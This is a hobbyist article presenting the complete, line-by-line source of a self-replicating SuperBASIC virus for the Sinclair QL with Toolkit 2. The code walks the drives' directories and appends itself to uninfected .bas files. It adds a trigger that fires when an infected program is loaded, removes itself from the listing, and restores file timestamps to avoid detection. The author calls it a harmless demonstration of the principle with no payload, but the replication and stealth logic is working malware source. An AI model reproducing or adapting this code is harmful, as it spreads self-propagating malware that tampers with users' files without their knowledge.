After a long-lasting and generally mis-spent career as a hobby programmer, I thought I might be excused just one little virus. This offering is not much; it doesnt set out to be scary or do any damage, it merely sets out to view the principle. However, it is not difficult to see that if this sort of thing had taken off in our little world, we would have been vulnerable!
This virus requires TK2 to work, but should otherwise run on most platforms. It was written before SMSQ/E came into my life, so this particular method does not work so well for that system.
I have implemented Virus as a procedure for no other reason than packaging. Obviously, for reasons of concealment it is better to avoid any form of labeling!
32710 DEFine PROCedure V_i_r_u_s 32711 LOCal ch%(18)
First seek out a target drive. The program default is perhaps a good starting point. However we don't know which devices the victim will have so try them all until we find a suitable one..
32712 IF LEN(PROGD$) > 3 THEN 32713 dev$ = PROGD$ 32714 ELSE : IF NOT FTEST("win1_") THEN 32715 dev$ = 'win1_' 32716 ELSE : IF NOT FTEST("flp1_") THEN 32717 dev$ = 'flp1_' 32718 ELSE : IF NOT FTEST("mdv1_") THEN 32719 dev$ = 'mdv1_': ELSE : RETurn : END IF 32720 END IF : END IF : END IF
Initialise variables. c% and n$ are required for the directory operations.
32721 c% = 0: n$ = '': virx$ = 'v_i_r_u_s'
Start decent of directory tree - not really the object of this particular discussion, so we won't go into the details here.
32722 REPeat dir_loop 32723 er = FOP_DIR(dev$ & n$) 32724 IF er >= 0: ch%(c%) = er: ELSE : EXIT dir_loop 32725 pos = -64 32726 REPeat file_loop 32727 pos = pos + 64 32728 IF pos >= FLEN(#ch%(c%)) THEN 32729 CLOSE#ch%(c%) 32730 c% = c% - 1: IF c% < 0: EXIT dir_loop 32731 pos = FPOS(#ch%(c%)) 32732 ELSE 32733 GET#ch%(c%)\ pos + 14; n$
n$ now contains the name of a possible candidate. If its length = 0 then it is the name of a deleted file: Ignore and get next file name.
32734 IF LEN(n$) = 0: NEXT file_loop
Determin the type. If a directory type then traverse this branch..
32735 BGET#ch%(c%)\ pos + 5; t% 32736 IF t% = 255: GET#ch%(c%)\ pos: c% = c% + 1: EXIT file_loop
Types other than zero are unlikely to be S(uper)BASIC files, so ignore.
32737 IF t% <> 0: NEXT file_loop
Look for file names ending on bas.>
32738 IF LEN(n$) < 5: NEXT file_loop 32739 IF NOT n$(LEN(n$) - 2 TO LEN(n$)) == 'bas': NEXT file_loop
Got one! Open it and check whether it already contains our virus by looking for our signature (V_i_r_u_s):
32740 er = FOPEN(dev$ & n$) 32741 IF er < 0: NEXT file_loop 32742 tc = er: er = 0 32743 GET#tc\ FLEN(#tc) - 21 32744 FOR i = 1 TO LEN(virx$): IF NOT INKEY$(#tc; -1) == virx$(i): er = 1: EXIT i 32745 IF er THEN
Ok, we have a candidate that has not yet been infected. Make a note of the date so that our update is less likely to be detected.
32746 GET#tc\ FLEN(#tc): dt = FUPDT(#tc)
Replicate!
32747 LIST#tc; 32710 TO
Append the trigger command: This is a bit tricky. We want to ensure that the virus gets activated at some point so it is implemented here as a direct command as opposed to a program line (which may never be reached). However, in SMSQ/E at least, this means that the program can neither be EXECuted nor LRUNed: the virus is activated simply by LOADing an infected program. The victim will probably soon notice that something strange is going on here. Doing a LIST, however, will reveal nothing as it surreptiously removes itself from program memory after execution. Furthermore, in this implementation a switch is required (if rnd(0 to 1)) to prevent the virus from calling itself repeatedly at the slight risk of it not getting executed about half of the time. SMSQ, which initialises variables to nul could have a positive switch, but this virus was designed to work on all systems (running TK2). Whether it actually runs or not, dline 32710 TO will ensure that most traces of the virus will be removed from the loaded program.
32748 PRINT#tc; 'if rnd(0 to 1): V_i_r_u_s'\ 'dline 32710 to' 32749 CLOSE#tc
Obfuscate: Re-adjust the time stamp.
32750 SET_FUPDT\ dev$ & n$, dt 32751 EXIT dir_loop 32752 ELSE 32753 CLOSE#tc 32754 END IF 32755 END IF 32756 END REPeat file_loop 32757 END REPeat dir_loop
There is no real payload with this particular virus. After sex it really wants to carry out its life task. This could go here.
End game: Tidy up any open channels.
32758 REPeat close_loop 32759 IF c% < 0: EXIT close_loop 32760 CLOSE#ch%(c%): c% = c% - 1 32761 END REPeat close_loop 32762 END DEFine V_i_r_u_s
That's all there is to it! Mind you, this is not a particulary clever virus; so much could go wrong that this program doesn't cater for. But then that wasn't the point of the "article"!